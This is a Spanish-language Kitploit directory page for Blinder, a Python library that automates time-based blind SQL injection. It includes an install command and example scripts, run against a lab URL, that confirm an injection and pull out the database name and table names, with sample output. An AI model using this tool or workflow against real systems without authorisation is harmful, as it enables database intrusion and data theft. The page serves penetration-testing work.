Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/mhaskar/blinder
Análisis de VulnerabilidadesSeguridad WebPruebas de PenetraciónSeguridad de Bases de Datos
GitHubmhaskar/blinder

Blinder

Una librería de Python para automatizar la inyección SQL ciega basada en tiempo

Ver Repositorio
50156hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Blinder

Blidner es una pequeña biblioteca de Python para automatizar la inyección SQL ciega basada en tiempo mediante el uso de consultas predefinidas como funciones para automatizar el desarrollo rápido de PoC.

Instalación

Puedes instalar Blinder usando el siguiente comando:

pip install blinder

O descargando el código fuente e importándolo manualmente a tu proyecto.

Uso

Para usar blinder necesitas importar el módulo Blinder y luego comenzar a usar las funciones principales de Blinder.

Puedes usar Blinder "con la versión actual" para hacer lo siguiente:

  • Verificar la inyección basada en tiempo.
  • Obtener el nombre de la base de datos.
  • Obtener los nombres de tablas.

Puedes verificar la inyección en una URL usando el siguiente código:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print blind.check_injection()

El resultado de la ejecución será:

root@kitploit:~
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#

Puedes obtener el nombre de la base de datos usando el siguiente código:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print "Database name is : %s " % blind.get_database()

Y los resultados serán:

root@kitploit:~
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#

Para obtener los nombres de tablas puedes usar el siguiente código:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

Y los resultados serán:

root@kitploit:~
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#

TODO

Muchas características deberían añadirse pronto, como:

  • la capacidad de agregar consultas personalizadas
  • probar puntos de inyección basados en la solicitud de burp
  • extraer datos de tablas/columnas
Descargar herramienta